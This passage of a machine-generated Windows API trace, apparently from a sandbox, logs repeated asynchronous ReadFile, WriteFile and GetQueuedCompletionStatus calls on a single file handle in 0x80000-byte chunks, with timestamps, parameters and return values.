lpOverlapped=0x3fdf90c) returned 1 [0137.324] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0137.325] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.327] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0137.328] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.329] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0137.381] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.383] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0137.384] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.384] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0137.385] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.386] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0137.388] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.388] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0137.688] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.689] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0137.691] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.691] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0137.692] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.694] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0137.695] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.695] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0137.723] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.725] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0137.728] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.728] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0137.729] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.742] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0137.786] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.786] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0137.803] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.805] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0137.807] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.807] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0137.808] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.810] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0137.811] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.811] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0137.820] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.822] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0137.823] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.823] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0137.824] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.835] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0137.837] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.837] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0137.868] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.869] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0137.871] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.871] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0137.872] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.874] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0137.876] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.876] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0137.924] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.931] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0137.933] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.933] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0137.935] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.936] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0137.938] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.938] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0137.961] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.963] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0137.965] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.965] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0137.966] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.967] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0137.969] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.969] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.032] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.034] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.035] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.035] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.036] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.037] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.039] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.039] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.057] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.058] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.089] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.089] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.114] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.116] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.117] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.117] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.138] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.140] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.142] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.142] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.144] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.147] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.148] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 